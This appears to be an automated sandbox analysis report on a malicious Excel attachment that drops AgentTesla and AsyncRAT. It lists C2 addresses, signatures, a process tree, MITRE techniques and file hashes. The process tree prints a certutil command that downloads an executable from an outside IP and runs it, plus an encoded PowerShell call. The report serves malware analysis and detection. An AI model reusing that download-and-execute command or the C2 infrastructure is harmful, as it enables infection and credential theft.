Analysis

  • max time kernel
    118s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    30-06-2022 15:52

General

  • Target

    Order1040258.xlsm

  • Size

    431KB

  • MD5

    a7a4f3a4aa943e3bd5e78789cec486d6

  • SHA1

    6bc828610e03758ea7121983b9e281b8e8b6fb47

  • SHA256

    7933ad4edab82e52f977bc9623aa7b24f63ac959efbf1cd5c8ecf73a4207b9c1

  • SHA512

    863820cc0e7cabbf18653ebda72bc2357624257f29f886a3f06c8fec4a53cf0f309117467c92a7da929d51d01f3eed1dac328301621224ed8cf28807afa92445

Malware Config

Extracted

Family

agenttesla

C2

http://136.144.41.76/bray/inc/a4a9ffb236214a.php

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:1111

62.197.136.167:6606

62.197.136.167:7707

62.197.136.167:8808

62.197.136.167:1111

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE AgentTesla Communicating with CnC Server

    suricata: ET MALWARE AgentTesla Communicating with CnC Server

  • suricata: ET MALWARE Generic AsyncRAT Style SSL Cert

    suricata: ET MALWARE Generic AsyncRAT Style SSL Cert

  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

  • Async RAT payload 6 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Order1040258.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://46.249.35.196/mid/Order1040258.exe" Agynyddjasev.exe.exe && Agynyddjasev.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://46.249.35.196/mid/Order1040258.exe" Agynyddjasev.exe.exe
        3⤵
          PID:2004
        • C:\Users\Admin\Documents\Agynyddjasev.exe.exe
          Agynyddjasev.exe.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:556
          • C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
            "C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1268
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:732
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxAA==
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1240
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            4⤵
            • Drops file in Drivers directory
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • outlook_office_path
            • outlook_win_path
            PID:1388

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Collection

    Email Collection

    1
    T1114

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
      Filesize

      172KB

      MD5

      982f97ccf89f9d50dbc5d152c7139a50

      SHA1

      0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

      SHA256

      f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

      SHA512

      c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

    • C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
      Filesize

      172KB

      MD5

      982f97ccf89f9d50dbc5d152c7139a50

      SHA1

      0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

      SHA256

      f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

      SHA512

      c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      0d62b070cf821f03fd5e8315d9fb6adb

      SHA1

      6c166f9d7e1bfd15a0caea72ee49fd866a39b575

      SHA256

      f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

      SHA512

      fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      0d62b070cf821f03fd5e8315d9fb6adb

      SHA1

      6c166f9d7e1bfd15a0caea72ee49fd866a39b575

      SHA256

      f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

      SHA512

      fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      0d62b070cf821f03fd5e8315d9fb6adb

      SHA1

      6c166f9d7e1bfd15a0caea72ee49fd866a39b575

      SHA256

      f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

      SHA512

      fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

    • C:\Users\Admin\AppData\Roaming\Tupbtqbro\Aeigqqh.exe
      Filesize

      172KB

      MD5

      64f238f4ae856e63b6f9d2f02d264f86

      SHA1

      99edc3db13ce32bb8945f46256d6ab01b1f4f096

      SHA256

      b135e38adf32f2419c2d4d892e3f9c45e3d9df0af170ced010f0757fb1840e32

      SHA512

      51c328ba30aeb94784b5f8689daa7c61b70c88ee2b611232e5f38abc201f7fe6f5146158da4348ac1f3e5050c9d9b56c87e0846f81875f4be9382aa849adf279

    • C:\Users\Admin\Documents\Agynyddjasev.exe.exe
      Filesize

      172KB

      MD5

      18d5927d197f41af4d9b16621b0515a6

      SHA1

      d2f4345de440d781b22f3ecf5b922783b4264bdd

      SHA256

      613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

      SHA512

      60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

    • C:\Users\Admin\Documents\Agynyddjasev.exe.exe
      Filesize

      172KB

      MD5

      18d5927d197f41af4d9b16621b0515a6

      SHA1

      d2f4345de440d781b22f3ecf5b922783b4264bdd

      SHA256

      613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

      SHA512

      60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

    • \Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
      Filesize

      172KB

      MD5

      982f97ccf89f9d50dbc5d152c7139a50

      SHA1

      0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

      SHA256

      f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

      SHA512

      c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

    • \Users\Admin\Documents\Agynyddjasev.exe.exe
      Filesize

      172KB

      MD5

      18d5927d197f41af4d9b16621b0515a6

      SHA1

      d2f4345de440d781b22f3ecf5b922783b4264bdd

      SHA256

      613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

      SHA512

      60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

    • memory/556-79-0x0000000000000000-mapping.dmp
    • memory/556-84-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/556-83-0x0000000004CC0000-0x0000000004F92000-memory.dmp
      Filesize

      2.8MB

    • memory/556-85-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/732-110-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/732-97-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/732-96-0x0000000004D30000-0x0000000005002000-memory.dmp
      Filesize

      2.8MB

    • memory/732-92-0x0000000000000000-mapping.dmp
    • memory/844-61-0x0000000000000000-mapping.dmp
    • memory/1240-120-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-121-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-124-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-123-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-125-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-126-0x000000000040C75E-mapping.dmp
    • memory/1240-130-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1240-128-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1268-111-0x0000000005800000-0x00000000058C4000-memory.dmp
      Filesize

      784KB

    • memory/1268-87-0x0000000000000000-mapping.dmp
    • memory/1268-90-0x00000000009D0000-0x0000000000A00000-memory.dmp
      Filesize

      192KB

    • memory/1388-104-0x0000000000435D8E-mapping.dmp
    • memory/1388-108-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-106-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-98-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-99-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-101-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-102-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1388-103-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/1528-70-0x0000000000000000-mapping.dmp
    • memory/1528-76-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/1528-73-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/1528-74-0x0000000004D10000-0x0000000004FE2000-memory.dmp
      Filesize

      2.8MB

    • memory/1928-117-0x0000000004C30000-0x0000000004F02000-memory.dmp
      Filesize

      2.8MB

    • memory/1928-118-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/1928-112-0x0000000000000000-mapping.dmp
    • memory/1928-116-0x0000000067950000-0x0000000067EFB000-memory.dmp
      Filesize

      5.7MB

    • memory/1964-57-0x00000000727FD000-0x0000000072808000-memory.dmp
      Filesize

      44KB

    • memory/1964-54-0x000000002FDB1000-0x000000002FDB4000-memory.dmp
      Filesize

      12KB

    • memory/1964-75-0x00000000727FD000-0x0000000072808000-memory.dmp
      Filesize

      44KB

    • memory/1964-58-0x0000000075401000-0x0000000075403000-memory.dmp
      Filesize

      8KB

    • memory/1964-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1964-55-0x0000000071811000-0x0000000071813000-memory.dmp
      Filesize

      8KB

    • memory/1964-132-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1964-133-0x00000000727FD000-0x0000000072808000-memory.dmp
      Filesize

      44KB

    • memory/1972-78-0x0000000004D70000-0x0000000004DBC000-memory.dmp
      Filesize

      304KB

    • memory/1972-68-0x0000000000F00000-0x0000000000F30000-memory.dmp
      Filesize

      192KB

    • memory/1972-66-0x0000000000000000-mapping.dmp
    • memory/1972-77-0x0000000005D80000-0x0000000005E58000-memory.dmp
      Filesize

      864KB

    • memory/2004-62-0x0000000000000000-mapping.dmp